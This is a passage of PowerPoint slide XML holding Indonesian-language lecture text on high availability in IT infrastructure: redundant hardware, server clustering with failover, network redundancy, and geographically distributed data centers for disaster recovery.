              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62086864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Ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Tinggi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (HA)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang minimal. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perancangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>toleransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, hard drive, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cluster </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server primer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekunder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, router, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konektivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mulus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>punggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan generator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkelanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beragam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>geografis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berskala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selanjutnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
